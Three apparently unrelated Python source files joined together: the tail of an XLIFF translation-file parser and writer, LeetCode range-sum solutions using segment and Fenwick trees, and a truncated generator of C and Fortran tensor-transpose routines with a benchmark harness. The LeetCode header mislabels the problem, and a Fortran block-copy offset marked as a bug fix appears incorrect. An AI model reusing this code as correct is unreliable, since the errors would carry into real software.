            source_tag = tu.find('xlf:seg-source', ns)
            if source_tag is None:
                source_tag = tu.find('xlf:source', ns)
            segments = source_tag.findall('.//xlf:mrk[@mtype="seg"]', ns)
            if segments is None or len(segments) == 0:
                entries.append((source_tag, target_tag))
            else:
                for source_segment in segments:
                    mid = source_segment.get('mid')
                    if mid is None:
                        raise ValueError('Invalid XLIFF, missing "mid" for <mrk>')
                    target_segment = target_tag.find('.//xlf:mrk[@mtype="seg"][@mid="%s"]' % mid, ns)
                    if target_segment is None:
                        raise ValueError('Invalid XLIFF, unable to locate <mrk> element for "mid" %s '
                                         'in <target> element' % mid)
                    entries.append((source_segment, target_segment))
            return cls(entries)

        def __init__(self, entries):
            self._entries = entries

        def __iter__(self):
            for entry in self._entries:
                yield entry

    @classmethod
    def _skip_source_tag(cls, tu, source_tag):
        """Return True when the segment is already translated and should be skipped.

        SDL segments at percent="100" are considered done; otherwise any
        non-empty <target> text counts as translated.
        """
        if 'mid' in source_tag.attrib:
            _id = source_tag.attrib['mid']
            match = tu.find('.//sdl:seg[@id="%s"][@percent="100"]' % _id, cls.NAMESPACES)
            return True if match is not None else False
        else:
            target_tag = tu.find('xlf:target', XLIFFFileFormat.NAMESPACES)
            text = ''.join(target_tag.itertext())
            return len(text.strip()) > 0

    @classmethod
    def _get_tag_name(cls, e):
        # Strip the "{namespace}" prefix ElementTree puts on qualified tags.
        return e.tag if '}' not in e.tag else e.tag.split('}', 1)[1]

    @classmethod
    def _get_source_content(cls, element):
        """Return (inner XML of *element*, list of placeholder elements).

        Inline markup (<ph>, <bpt>, <ept>, <it>) is replaced by numbered
        placeholder stubs; the original elements are returned so the writer
        can restore them.  Returns (None, None) for empty content.
        """
        if element is None:
            return None, None

        def _navigate(el, placeholders):
            for child in list(el):
                name = cls._get_tag_name(child)
                if name in ['ph', 'bpt', 'ept', 'it']:
                    clone = copy.deepcopy(child)
                    clone.tail = None
                    placeholders.append(clone)
                    child.text = None
                    child.attrib = {'id': str(len(placeholders))}
                else:
                    _navigate(child, placeholders)
            return el, placeholders

        content, _placeholders = _navigate(copy.deepcopy(element), [])
        content = ElementTree.tostring(content, encoding='utf-8', method='xml').decode('utf-8')
        # Strip the enclosing open/close tags, keeping only the inner XML.
        content = content[content.find('>') + 1:]
        content = content[:content.rfind('</%s>' % cls._get_tag_name(element))]
        return (content, _placeholders) if len(content) > 0 else (None, None)

    def __init__(self, file_path, tgt_lang) -> None:
        """Parse *file_path* and collect untranslated segments targeting *tgt_lang*."""
        self._file_path = file_path
        self._output_file = file_path  # default: overwrite the input in place
        self._units = []
        for namespace, uri in self.NAMESPACES.items():
            if namespace == 'xlf':
                namespace = ''  # register XLIFF as the default namespace
            ElementTree.register_namespace(namespace, uri)
        with open(file_path, 'r', encoding='utf-8') as in_stream:
            self._xliff = ElementTree.fromstring(in_stream.read())
        for tu in self._xliff.findall('.//xlf:trans-unit', self.NAMESPACES):
            trans_unit = self.TransUnit.parse(tu, tgt_lang)
            for source_tag, target_tag in trans_unit:
                if self._skip_source_tag(tu, source_tag):
                    continue
                source_content, placeholders = self._get_source_content(source_tag)
                if source_content is None:
                    continue
                self._units.append((source_tag, target_tag))

    def write_to(self, output_file):
        """Redirect serialization to *output_file* instead of the input path."""
        self._output_file = output_file

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        pass

    def __iter__(self):
        for st, tt in self._units:
            src_content, _ = self._get_source_content(st)
            tgt_content, _ = self._get_source_content(tt)
            yield src_content, tgt_content

    def reader(self):
        """The format object itself iterates (source, target) content strings."""
        return self

    def writer(self, append=False):
        """Return a writer that patches translations back into the XML tree.

        ``write`` is positional: the i-th call fills the i-th collected unit.
        The full document is serialized when the writer context exits.
        """
        class _Writer(object):
            def __init__(self, xliff, units, output_file, get_content_f):
                self._index = 0
                self._xliff = xliff
                self._units = units
                self._xlf_ns = XLIFFFileFormat.NAMESPACES['xlf']
                self._get_content_f = get_content_f
                self._output_file = output_file
                self._output_stream = None

            def __enter__(self):
                self._output_stream = open(self._output_file, 'w', encoding='utf-8')
                return self

            def __exit__(self, exc_type, exc_val, exc_tb):
                xliff_str = ElementTree.tostring(self._xliff, encoding='utf-8', method='xml').decode('utf-8')
                self._output_stream.write(xliff_str)
                self._output_stream.write('\n')
                self._output_stream.close()

            def write(self, _, content):
                source_tag, target_tag = self._units[self._index]
                self._index += 1
                source_text, placeholders = self._get_content_f(source_tag)
                # Preserve the source's trailing whitespace on the translation.
                trailing_match = re.search(r'\s*$', source_text)
                trailing_space = trailing_match.group() if trailing_match is not None else ''
                content = u'<content xmlns="%s">%s</content>' % (self._xlf_ns, content.rstrip() + trailing_space)
                content = ElementTree.fromstring(content)
                # Replace placeholders with the original inline elements.
                # BUGFIX: Element.getiterator() was removed in Python 3.9;
                # Element.iter() is the equivalent supported replacement.
                parent_map = dict((c, p) for p in content.iter() for c in p)
                for i, source in enumerate(placeholders):
                    target = content.find('.//%s[@id="%d"]' % (source.tag, i + 1))
                    if target is not None:
                        source.tail = target.tail
                        parent = parent_map[target]
                        parent_index = list(parent).index(target)
                        parent.remove(target)
                        parent.insert(parent_index, source)
                # Clear target element
                for child in list(target_tag):
                    target_tag.remove(child)
                # Replace target content
                target_tag.text = content.text
                for child in list(content):
                    content.remove(child)
                    target_tag.append(child)
        return _Writer(self._xliff, self._units, self._output_file, self._get_source_content)
| |
__source__ = 'https://leetcode.com/problems/range-sum-query-immutable/'
# https://github.com/kamyu104/LeetCode/blob/master/Python/range-sum-query-immutable.py
# Time: ctor: O(n),
# update: O(logn),
# query: O(logn)
# Space: O(n)
#
# Description: Leetcode # 303. Range Sum Query - Immutable
#
# Given an integer array nums, find the sum of
# the elements between indices i and j (i <= j), inclusive.
#
# The update(i, val) function modifies nums by
# updating the element at index i to val.
# Example:
# Given nums = [1, 3, 5]
#
# sumRange(0, 2) -> 9
# update(1, 2)
# sumRange(0, 2) -> 8
# Note:
# The array is only modifiable by the update function.
# You may assume the number of calls to update
# and sumRange function is distributed evenly.
#
# Companies
# Palantir
# Related Topics
# Dynamic Programming
# Similar Questions
# Range Sum Query 2D - Immutable Range Sum Query - Mutable Maximum Size Subarray Sum Equals k
#
import unittest
# Segment Tree solution.
class NumArray(object):
    """Range-sum structure over an integer list, backed by a segment tree.

    Construction is O(n); point update and inclusive range-sum query are
    both O(log n).
    """
    def __init__(self, nums):
        """
        initialize your data structure here.
        :type nums: List[int]
        """
        # Build segment tree.
        self.__nums = nums
        def buildHelper(nums, start, end):
            # Recursively build the subtree covering nums[start..end].
            if start > end:
                return None
            # BUGFIX: the original referenced self.__SegmentTreeNode, which
            # name-mangles to NumArray._NumArray__SegmentTreeNode and raises
            # AttributeError -- the node class lives at module level.
            root = _SegmentTreeNode(start, end, 0)
            # A single-element range is a leaf.
            if start == end:
                root.sum = nums[start]
                return root
            # BUGFIX: floor division -- '/' yields a float index on Python 3.
            mid = (start + end) // 2
            root.left = buildHelper(nums, start, mid)
            root.right = buildHelper(nums, mid + 1, end)
            # Internal node sum = sum of children.
            root.sum = (root.left.sum if root.left else 0) + \
                       (root.right.sum if root.right else 0)
            return root
        self.__root = buildHelper(nums, 0, len(nums) - 1)

    def update(self, i, val):
        """
        Set nums[i] to val.
        :type i: int
        :type val: int
        :rtype: None
        """
        def updateHelper(root, i, val):
            # Out of range.
            if not root or root.start > i or root.end < i:
                return
            # Leaf holding index i: overwrite its value.
            if root.start == i and root.end == i:
                root.sum = val
                return
            updateHelper(root.left, i, val)
            updateHelper(root.right, i, val)
            # Recompute sum on the way back up.
            root.sum = (root.left.sum if root.left else 0) + \
                       (root.right.sum if root.right else 0)
        if self.__nums[i] != val:
            self.__nums[i] = val
            updateHelper(self.__root, i, val)

    def sumRange(self, i, j):
        """
        sum of elements nums[i..j], inclusive.
        :type i: int
        :type j: int
        :rtype: int
        """
        def sumRangeHelper(root, start, end):
            # Out of range.
            if not root or root.start > end or root.end < start:
                return 0
            # Current segment is totally within range [start, end].
            if root.start >= start and root.end <= end:
                return root.sum
            return sumRangeHelper(root.left, start, end) + \
                   sumRangeHelper(root.right, start, end)
        return sumRangeHelper(self.__root, i, j)


class _SegmentTreeNode:
    # Node covering the inclusive index range [start, end] with subtree sum `sum`.
    def __init__(self, i, j, s):
        self.start, self.end, self.sum = i, j, s
#
# Time: ctor: O(nlogn),
# update: O(logn),
# query: O(logn)
# Space: O(n)
# Binary Indexed Tree (BIT) solution.
#
# 112ms 26.40%
class NumArray2(object):
    """Range-sum structure backed by a Binary Indexed Tree (Fenwick tree).

    Construction is O(n log n); update and range query are O(log n).
    """
    def __init__(self, nums):
        """
        initialize your data structure here.
        :type nums: List[int]
        """
        # Nothing to index for an empty input.
        if not nums:
            return
        self.__nums = nums
        self.__bit = [0] * (len(nums) + 1)
        for idx, value in enumerate(nums):
            self.__add(idx, value)

    def update(self, i, val):
        """
        :type i: int
        :type val: int
        :rtype: int
        """
        delta = val - self.__nums[i]
        if delta:
            self.__add(i, delta)
            self.__nums[i] = val

    def sumRange(self, i, j):
        """
        sum of elements nums[i..j], inclusive.
        :type i: int
        :type j: int
        :rtype: int
        """
        def prefix(k):
            # Sum of nums[0..k] via the BIT (1-based internally).
            k += 1
            total = 0
            while k > 0:
                total += self.__bit[k]
                k -= (k & -k)  # drop lowest set bit
            return total
        if i > 0:
            return prefix(j) - prefix(i - 1)
        return prefix(j)

    def __add(self, i, val):
        # Propagate a delta at index i up the tree (1-based internally).
        i += 1
        while i <= len(self.__nums):
            self.__bit[i] += val
            i += (i & -i)
# Your NumArray object will be instantiated and called as such:
# numArray = NumArray(nums)
# numArray.sumRange(0, 1)
# numArray.update(1, 10)
# numArray.sumRange(1, 2)
class TestMethods(unittest.TestCase):
    """Placeholder test case: confirms the unittest harness itself runs."""

    def test_Local(self):
        # Trivial sanity assertion.
        self.assertEqual(1, 1)


if __name__ == '__main__':
    unittest.main()
# Reference Java implementations, kept verbatim in a module-level string.
# Never executed; retained as study notes alongside the Python solutions.
Java = '''
# Thought: https://leetcode.com/problems/range-sum-query-immutable/solution/
# 73.20% 213ms
class NumArray {
int[] sum;
public NumArray(int[] nums) {
int n = nums.length;
sum = new int[n+1];
sum[0] = 0;
for(int i=1;i<=n;i++){
sum[i] = sum[i-1]+nums[i-1];
}
}
public int sumRange(int i, int j) {
return sum[j+1]-sum[i];
}
}
# 115ms 98.39%
class NumArray {
int[] mSum;
public NumArray(int[] nums) {
for (int i = 1; i < nums.length; i++) {
nums[i] += nums[i - 1];
}
mSum = nums;
}
public int sumRange(int i, int j) {
if ( i ==0 ) return mSum[j];
return mSum[j] - mSum[i-1];
}
}
// Your NumArray object will be instantiated and called as such:
// NumArray numArray = new NumArray(nums);
// numArray.sumRange(0, 1);
// numArray.sumRange(1, 2);
# BIT
# 142ms 75.89%
class NumArray {
int[] mNums;
int[] mBit;
public NumArray(int[] nums) {
mNums = nums;
mBit = new int[nums.length + 1];
for (int i = 0; i < nums.length; i++) {
buildTree(i, nums[i]);
}
}
public int sumRange(int i, int j) {
return getSum(j) - getSum(i - 1);
}
private void buildTree(int i, int val) {
i++;
while (i <= mNums.length) {
mBit[i] += val;
i += (i & -i);
}
}
private int getSum(int i) {
i++;
int sum = 0;
while ( i > 0) {
sum += mBit[i];
i -= (i & -i);
}
return sum;
}
}
# Segment Tree:
# 201ms 38.86%
class NumArray {
Node mRoot = null;
public NumArray(int[] nums) {
mRoot = buildStree(nums, 0, nums.length - 1);
}
public int sumRange(int i, int j) {
return getSum(mRoot, i, j);
}
private Node buildStree(int[] nums, int start, int end) {
if (start > end) return null;
Node node = new Node(start, end);
if (start == end) node.mSum = nums[start];
else {
int mid = start + (end - start) / 2;
node.mLeft = buildStree(nums, start, mid);
node.mRight = buildStree(nums, mid + 1, end);
node.mSum = node.mLeft.mSum + node.mRight.mSum;
}
return node;
}
private int getSum(Node node, int i, int j) {
if (i == node.mStart && j == node.mEnd) return node.mSum;
else {
int mid = node.mStart + (node.mEnd - node.mStart) / 2;
if (j <= mid) { //tricky
return getSum(node.mLeft, i, j);
} else if (mid + 1 <= i) { //tricky
return getSum(node.mRight, i, j);
} else {
return getSum(node.mLeft, i, mid) + getSum(node.mRight, mid+1, j);
}
}
}
class Node{
int mStart, mEnd, mSum;
Node mLeft, mRight;
public Node(int start, int end){
mStart = start;
mEnd = end;
mSum = 0;
mLeft = mRight = null;
}
}
}
'''
| |
#!/usr/bin/python
import fileinput
import string
import sys
import os
import subprocess
def perm(l):
    """Return every permutation of list *l* as a list of lists.

    By convention perm([]) == [[]] and perm([x]) == [[x]].
    BUGFIX: uses range() instead of xrange() so the function works on both
    Python 2 (where range returns an equivalent list) and Python 3 (where
    xrange does not exist).
    """
    sz = len(l)
    if sz <= 1:
        return [l]
    # Insert the head element at every position of each tail permutation.
    return [p[:i] + [l[0]] + p[i:] for i in range(sz) for p in perm(l[1:])]
def generate_permutation_list(Debug):
    """Return the transpose orderings to generate: just the identity
    ['1','2','3','4'] when *Debug* is true, otherwise all 24 permutations.
    """
    indices = ['1', '2', '3', '4']
    return [indices] if Debug else perm(indices)
def perm_to_string(perm):
    """Concatenate the four order digits of *perm* into a string like '1234'."""
    return perm[0] + perm[1] + perm[2] + perm[3]
def get_omp_info(OpenMP):
    """Map the OpenMP flag to a (file-name suffix, human-readable text) pair."""
    if not OpenMP:
        return ('nomp', 'without OpenMP')
    return ('omp', 'with OpenMP')
#
# NOTES
#
# collapse(4) is not good. on BGQ it is terrible, probably due to L1 thrashing.
def generate_cfunction(ofile, name, description, OpenMP, transpose_order, loop_order):
    """Emit a C function that permutes a rank-4 tensor.

    The generated function computes sorted = g*sorted + f*unsorted with the
    index permutation given by *transpose_order*, looping in *loop_order*,
    specialized into five branches for the common (f, g) combinations.

    ofile           -- writable stream receiving the C source text
    name            -- name of the generated C function
    description     -- comment block written verbatim before the function
    OpenMP          -- emit '#pragma omp parallel for' around each loop nest
    transpose_order -- four digit-strings giving the output index order
    loop_order      -- four digit-strings giving the loop nesting order

    BUGFIX: the original emitted 'const int f = *factor;' and
    'const int g = *acc_factor;', truncating non-integer scale factors;
    both are declared double now, matching the double* parameters.
    """
    A = transpose_order[0]
    B = transpose_order[1]
    C = transpose_order[2]
    D = transpose_order[3]
    a = loop_order[0]
    b = loop_order[1]
    c = loop_order[2]
    d = loop_order[3]
    # Destination/source index expressions shared by every branch.
    dst = 'sorted[j'+D+'+d'+D+'*(j'+C+'+d'+C+'*(j'+B+'+d'+B+'*(j'+A+')))]'
    src = 'unsorted[j4+d4*(j3+d3*(j2+d2*(j1)))]'
    def _emit_loop_nest(privates, statement):
        # One (optionally OpenMP-decorated) 4-deep loop nest around a
        # single assignment statement.
        if OpenMP:
            ofile.write('#ifdef _OPENMP \n')
            ofile.write('#pragma omp parallel for collapse(2) firstprivate('+privates+') shared(sorted,unsorted) schedule(static)\n')
            ofile.write('#endif \n')
        for j in (a, b, c, d):
            ofile.write('    for (int j'+j+' = 0; j'+j+'<d'+j+'; j'+j+'++) {\n')
        ofile.write('      '+statement+'\n')
        ofile.write('    }}}}\n\n')
    ofile.write(description)
    ofile.write('void '+name+'(const double * restrict unsorted, double * restrict sorted, const int * const dim1, const int * const dim2, const int * const dim3, const int * const dim4, const double * const factor, const double * const acc_factor)\n')
    ofile.write('{\n')
    ofile.write('  const int d1 = *dim1;\n')
    ofile.write('  const int d2 = *dim2;\n')
    ofile.write('  const int d3 = *dim3;\n')
    ofile.write('  const int d4 = *dim4;\n')
    # BUGFIX: these were 'const int', silently truncating double factors.
    ofile.write('  const double f = *factor;\n')
    ofile.write('  const double g = *acc_factor;\n')
    ofile.write('  if (f==1.0 && g==0.0) {\n')
    _emit_loop_nest('d1,d2,d3,d4', dst+' = '+src+';')
    ofile.write('  } else if (f!=1.0 && g==0.0) { \n\n')
    _emit_loop_nest('d1,d2,d3,d4,f', dst+' = f*'+src+';')
    ofile.write('  } else if (f==1.0 && g==1.0) { \n\n')
    _emit_loop_nest('d1,d2,d3,d4,f', dst+' += '+src+';')
    ofile.write('  } else if (f!=1.0 && g==1.0) { \n\n')
    _emit_loop_nest('d1,d2,d3,d4,f', dst+' += f*'+src+';')
    ofile.write('  } else { \n\n')
    _emit_loop_nest('d1,d2,d3,d4,f,g', dst+' = g*'+dst+' + f*'+src+';')
    ofile.write('  }\n\n')
    ofile.write('  return;\n')
    ofile.write('}\n\n')
    return
def generate_subroutine(ofile, name, description, OpenMP, transpose_order, loop_order):
    """Emit a fixed-form Fortran subroutine that permutes a rank-4 tensor,
    computing sorted = acc_factor*sorted + factor*unsorted, specialized into
    five runtime branches on (factor, acc_factor).

    BUGFIXES relative to the original generator:
      * cases 3/4 emitted 'sorted(...) += ...' -- Fortran has no '+=';
        they now emit an explicit 'sorted = sorted + ...' assignment;
      * case 5 (the general branch) ignored factor and acc_factor entirely;
      * the f_memcpy fast paths were taken for every factor case, although a
        straight copy is only valid when factor==1 and acc_factor==0 (case 1);
      * the partial f_memcpy calls passed 0-based offsets (index 0 for the
        first block) into 1-based Fortran arrays; '+1' fixes the off-by-one.
    """
    A = transpose_order[0]
    B = transpose_order[1]
    C = transpose_order[2]
    D = transpose_order[3]
    a = loop_order[0]
    b = loop_order[1]
    c = loop_order[2]
    d = loop_order[3]
    ofile.write(description)
    ofile.write('       subroutine '+name+'(unsorted,sorted,\n')
    ofile.write('     & dim1,dim2,dim3,dim4,factor,acc_factor)\n')
    ofile.write('       implicit none\n')
    ofile.write('       integer dim1,dim2,dim3,dim4\n')
    ofile.write('       integer j1,j2,j3,j4\n')
    ofile.write('       double precision sorted(dim1*dim2*dim3*dim4)\n')
    ofile.write('       double precision unsorted(dim1*dim2*dim3*dim4)\n')
    ofile.write('       double precision factor\n')
    ofile.write('       double precision acc_factor\n')
    for case in [1,2,3,4,5]:
        # One branch of the runtime (factor, acc_factor) dispatch.
        if case==1:
            ofile.write('       if ((factor .eq. 1.0).and.(acc_factor .eq. 0.0)) then\n')
        elif case==2:
            ofile.write('       else if ((factor .ne. 1.0).and.(acc_factor .eq. 0.0)) then\n')
        elif case==3:
            ofile.write('       else if ((factor .eq. 1.0).and.(acc_factor .eq. 1.0)) then\n')
        elif case==4:
            ofile.write('       else if ((factor .ne. 1.0).and.(acc_factor .eq. 1.0)) then\n')
        elif case==5:
            ofile.write('       else \n')
        if OpenMP:
            #ofile.write('!$omp parallel do collapse(2)\n')
            ofile.write('!$omp parallel do \n')
            ofile.write('!$omp& private(j1,j2,j3,j4)\n')
            if case==1 or case==3:
                ofile.write('!$omp& firstprivate(dim1,dim2,dim3,dim4)\n')
            elif case==2 or case==4:
                ofile.write('!$omp& firstprivate(dim1,dim2,dim3,dim4,factor)\n')
            elif case==5:
                ofile.write('!$omp& firstprivate(dim1,dim2,dim3,dim4,factor,acc_factor)\n')
            ofile.write('!$omp& shared(sorted,unsorted)\n')
            ofile.write('!$omp& schedule(static)\n')
        if case==5:
            # General case: full loop nest with both scale factors applied.
            ofile.write('       do j'+a+' = 1,dim'+a+'\n')
            ofile.write('       do j'+b+' = 1,dim'+b+'\n')
            ofile.write('       do j'+c+' = 1,dim'+c+'\n')
            ofile.write('       do j'+d+' = 1,dim'+d+'\n')
            # BUGFIX: apply acc_factor and factor (previously a plain accumulate).
            ofile.write('          sorted(j'+D+'+dim'+D+'*(j'+C+'-1+dim'+C+'*(j'+B+'-1+dim'+B+'*(j'+A+'-1)))) = \n')
            ofile.write('     &    acc_factor*\n')
            ofile.write('     &    sorted(j'+D+'+dim'+D+'*(j'+C+'-1+dim'+C+'*(j'+B+'-1+dim'+B+'*(j'+A+'-1)))) + \n')
            ofile.write('     &    factor*\n')
            ofile.write('     &    unsorted(j4+dim4*(j3-1+dim3*(j2-1+dim2*(j1-1))))\n')
            ofile.write('       enddo\n')
            ofile.write('       enddo\n')
            ofile.write('       enddo\n')
            ofile.write('       enddo\n')
        else:
            # f_memcpy is a straight copy, so the fast paths below are only
            # valid for case 1 (factor==1, acc_factor==0).
            if (case==1 and not OpenMP and a=='1' and A=='1' and b=='2' and B=='2' and c=='3' and C=='3' and d=='4' and D=='4'):
                ofile.write('        call f_memcpy(sorted(1),unsorted(1),dim'+d+'*dim'+c+'*dim'+b+'*dim'+a+')\n')
            elif (case==1 and b=='2' and B=='2' and c=='3' and C=='3' and d=='4' and D=='4'):
                ofile.write('        do j'+a+' = 1,dim'+a+'\n')
                ofile.write('        call f_memcpy(\n')
                # BUGFIX: '+1' converts the 0-based offset to a 1-based index.
                ofile.write('     1 sorted(dim'+B+'*(j'+A+'-1)+1),\n')
                ofile.write('     2 unsorted(dim2*(j1-1)+1),\n')
                ofile.write('     3 dim'+d+'*dim'+c+'*dim'+b+')\n')
                ofile.write('        enddo\n')
            elif (case==1 and c=='3' and C=='3' and d=='4' and D=='4'):
                ofile.write('        do j'+a+' = 1,dim'+a+'\n')
                ofile.write('        do j'+b+' = 1,dim'+b+'\n')
                ofile.write('        call f_memcpy(\n')
                ofile.write('     1 sorted(dim'+C+'*(j'+B+'-1+dim'+B+'*(j'+A+'-1))+1),\n')
                ofile.write('     2 unsorted(dim3*(j2-1+dim2*(j1-1))+1),\n')
                ofile.write('     3 dim'+d+'*dim'+c+')\n')
                ofile.write('        enddo\n')
                ofile.write('        enddo\n')
            elif (case==1 and d=='4' and D=='4'):
                ofile.write('        do j'+a+' = 1,dim'+a+'\n')
                ofile.write('        do j'+b+' = 1,dim'+b+'\n')
                ofile.write('        do j'+c+' = 1,dim'+c+'\n')
                ofile.write('        call f_memcpy(\n')
                ofile.write('     1 sorted(dim'+D+'*(j'+C+'-1+dim'+C+'*(j'+B+'-1+dim'+B+'*(j'+A+'-1)))+1),\n')
                ofile.write('     2 unsorted(dim4*(j3-1+dim3*(j2-1+dim2*(j1-1)))+1),\n')
                ofile.write('     3 dim'+d+')\n')
                ofile.write('        enddo\n')
                ofile.write('        enddo\n')
                ofile.write('        enddo\n')
            else:
                ofile.write('        do j'+a+' = 1,dim'+a+'\n')
                ofile.write('        do j'+b+' = 1,dim'+b+'\n')
                ofile.write('        do j'+c+' = 1,dim'+c+'\n')
                ofile.write('        do j'+d+' = 1,dim'+d+'\n')
                if case==1:
                    ofile.write('           sorted(j'+D+'+dim'+D+'*(j'+C+'-1+dim'+C+'*(j'+B+'-1+dim'+B+'*(j'+A+'-1)))) = \n')
                    ofile.write('     &     unsorted(j4+dim4*(j3-1+dim3*(j2-1+dim2*(j1-1))))\n')
                elif case==2:
                    ofile.write('           sorted(j'+D+'+dim'+D+'*(j'+C+'-1+dim'+C+'*(j'+B+'-1+dim'+B+'*(j'+A+'-1)))) = \n')
                    ofile.write('     &     factor*unsorted(j4+dim4*(j3-1+dim3*(j2-1+dim2*(j1-1))))\n')
                elif case==3:
                    # BUGFIX: '+=' is not valid Fortran; spell out the accumulate.
                    ofile.write('           sorted(j'+D+'+dim'+D+'*(j'+C+'-1+dim'+C+'*(j'+B+'-1+dim'+B+'*(j'+A+'-1)))) = \n')
                    ofile.write('     &     sorted(j'+D+'+dim'+D+'*(j'+C+'-1+dim'+C+'*(j'+B+'-1+dim'+B+'*(j'+A+'-1)))) + \n')
                    ofile.write('     &     unsorted(j4+dim4*(j3-1+dim3*(j2-1+dim2*(j1-1))))\n')
                elif case==4:
                    # BUGFIX: '+=' is not valid Fortran; spell out the accumulate.
                    ofile.write('           sorted(j'+D+'+dim'+D+'*(j'+C+'-1+dim'+C+'*(j'+B+'-1+dim'+B+'*(j'+A+'-1)))) = \n')
                    ofile.write('     &     sorted(j'+D+'+dim'+D+'*(j'+C+'-1+dim'+C+'*(j'+B+'-1+dim'+B+'*(j'+A+'-1)))) + \n')
                    ofile.write('     &     factor*unsorted(j4+dim4*(j3-1+dim3*(j2-1+dim2*(j1-1))))\n')
                ofile.write('        enddo\n')
                ofile.write('        enddo\n')
                ofile.write('        enddo\n')
                ofile.write('        enddo\n')
        if OpenMP:
            ofile.write('!$omp end parallel do\n')
    ofile.write('       endif\n')
    ofile.write('       return\n')
    ofile.write('       end\n\n')
    return
def generate_tester(ofile, transpose_order, reps, Language):
    """Writes (as Fortran source on ofile) the benchmark subroutine
    test_trans_<perm>_<Language>.

    The emitted subroutine times the reference old_sort_4 / old_sortacc_4
    routines and then every generated loop-order variant -- with and
    without OpenMP -- for this transpose order, and finally prints the
    best loop order found for each (factor, omp) combination.

    Args:
        ofile: file. Open file object receiving the Fortran source.
        transpose_order: sequence of 4 elements. The index permutation.
        reps: int. Repetition count baked into each timing loop.
        Language: str. 'f' or 'c'; selects which generated variants to call.
    """
    A = transpose_order[0]
    B = transpose_order[1]
    C = transpose_order[2]
    D = transpose_order[3]
    test_name = 'trans_'+perm_to_string(transpose_order)+'_'+Language
    ofile.write(' subroutine test_'+test_name+'(reference, unsorted, sorted,\n')
    ofile.write(' & dim1, dim2, dim3, dim4)\n')
    ofile.write(' implicit none\n')
    ofile.write('! external variables\n')
    ofile.write(' integer dim1, dim2, dim3, dim4\n')
    ofile.write(' double precision sorted(dim1*dim2*dim3*dim4)\n')
    ofile.write(' double precision unsorted(dim1*dim2*dim3*dim4)\n')
    ofile.write(' double precision reference(dim1*dim2*dim3*dim4)\n')
    ofile.write('! internal variables\n')
    ofile.write(' integer errors\n')
    ofile.write(' integer loop, omp, fac, r\n')
    ofile.write(' integer loops(4,24) \n')
    ofile.write(' integer bestloop(4,5,2) ! best loop order for (fac,omp) \n')
    ofile.write(' double precision factor, acc_factor\n')
    ofile.write(' double precision t0, t1 \n')
    ofile.write(' double precision dt0 ! reference timing for old_sort \n')
    ofile.write(' double precision dt1 ! reference timing for old_sortacc \n')
    ofile.write(' double precision dtX ! reference timing for comparison \n')
    ofile.write(' double precision dt(24,5,2) ! time for (loop,fac,omp) \n')
    ofile.write(' double precision besttime(5,2) ! best time for (fac,omp) \n')
    ofile.write(' double precision wtime\n')
    ofile.write(' external wtime\n')
    ofile.write(' character*20 labels(2,5)\n')
    # Emit initialization of the timing table to a large sentinel so that
    # untested slots can never win the "best time" comparison below.
    ofile.write(' do omp = 1, 2\n')
    ofile.write(' do fac = 1, 5\n')
    ofile.write(' labels(omp,fac) = \'UNDEFINED\' \n')
    ofile.write(' do loop = 1, 24\n')
    ofile.write(' dt(loop,fac,omp) = 1000000.0\n')
    ofile.write(' enddo\n')
    ofile.write(' enddo\n')
    ofile.write(' enddo\n')
    ofile.write(' call init_4d_array(dim1,dim2,dim3,dim4,unsorted)\n')
    # Each (Factor, Accumulate) pair maps onto a 'fac' case 1..5 (plain copy,
    # scaled copy, accumulate, scaled accumulate, non-unit accumulate factor).
    for (Factor,Accumulate) in [(1.0,0.0),(37.0,0.0),(1.0,1.0),(37.0,1.0),(37.0,37.0)]:
        if (Accumulate==0.0):
            if Factor==1.0:
                fac = 1
            else:
                fac = 2
        elif (Accumulate==1.0):
            if Factor==1.0:
                fac = 3
            else:
                fac = 4
        else:
            fac = 5
        if (Accumulate==0.0):
            old_name = 'old_sort_4'
        else:
            old_name = 'old_sortacc_4'
        # flush cache routine belongs here if we want to do that
        # Emit timing of the reference implementation; its output is also the
        # correctness baseline for the generated variants below.
        ofile.write(' call zero_1d_array(dim1*dim2*dim3*dim4,reference)\n')
        ofile.write(' t0 = wtime() \n')
        ofile.write(' factor = '+str(Factor)+'\n')
        ofile.write(' do r = 1,'+str(reps)+'\n')
        ofile.write(' call '+old_name+'(unsorted,reference,\n')
        ofile.write(' & dim1,dim2,dim3,dim4,\n')
        ofile.write(' & '+str(A)+','+str(B)+','+str(C)+','+str(D)+',factor)\n')
        ofile.write(' enddo\n')
        ofile.write(' t1 = wtime() \n')
        if (Accumulate==0.0):
            ofile.write(' dt0 = (t1-t0) \n')
        else:
            ofile.write(' dt1 = (t1-t0) \n')
        for OpenMP in [False,True]:
            (omp_name,omp_text) = get_omp_info(OpenMP)
            if OpenMP:
                omp = 2
            else:
                omp = 1
            loop = 0
            # Emit a timed run of every generated loop-order variant for this
            # (fac, omp) combination.  NOTE: uses the module-level Debug flag.
            for loop_order in generate_permutation_list(Debug):
                loop = loop+1
                a = loop_order[0]
                b = loop_order[1]
                c = loop_order[2]
                d = loop_order[3]
                source_name = 'trans_'+perm_to_string(transpose_order)+'_loop_'+perm_to_string(loop_order)
                variant = omp_name+'_'+Language
                subroutine_name = source_name+'_'+variant
                ofile.write(' labels('+str(omp)+','+str(fac)+') = \''+variant+'('+str(Factor)+','+str(Accumulate)+')\' \n')
                ofile.write('!******** '+str(a)+','+str(b)+','+str(c)+','+str(d)+' ********\n')
                ofile.write(' fac = '+str(fac)+' \n')
                ofile.write(' omp = '+str(omp)+' \n')
                ofile.write(' loop = '+str(loop)+' \n')
                ofile.write(' loops(1,loop) = '+str(a)+'\n')
                ofile.write(' loops(2,loop) = '+str(b)+'\n')
                ofile.write(' loops(3,loop) = '+str(c)+'\n')
                ofile.write(' loops(4,loop) = '+str(d)+'\n')
                ofile.write(' call zero_1d_array(dim1*dim2*dim3*dim4,sorted)\n')
                # flush cache routine belongs here if we want to do that
                ofile.write(' factor = '+str(Factor)+'\n')
                ofile.write(' acc_factor = '+str(Accumulate)+'\n')
                ofile.write(' t0 = wtime() \n')
                ofile.write(' do r = 1,'+str(reps)+'\n')
                ofile.write(' call '+subroutine_name+'(unsorted,sorted,\n')
                ofile.write(' & dim1,dim2,dim3,dim4,factor,acc_factor)\n')
                ofile.write(' enddo\n')
                ofile.write(' t1 = wtime() \n')
                # Accumulating runs (acc_factor != 0) cannot be checked against
                # the plain reference, so correctness is only verified when
                # acc_factor == 0; otherwise errors is forced to zero.
                ofile.write(' if (acc_factor .eq. 0.0) then\n')
                ofile.write(' call compare_1d_array(dim1*dim2*dim3*dim4,\n')
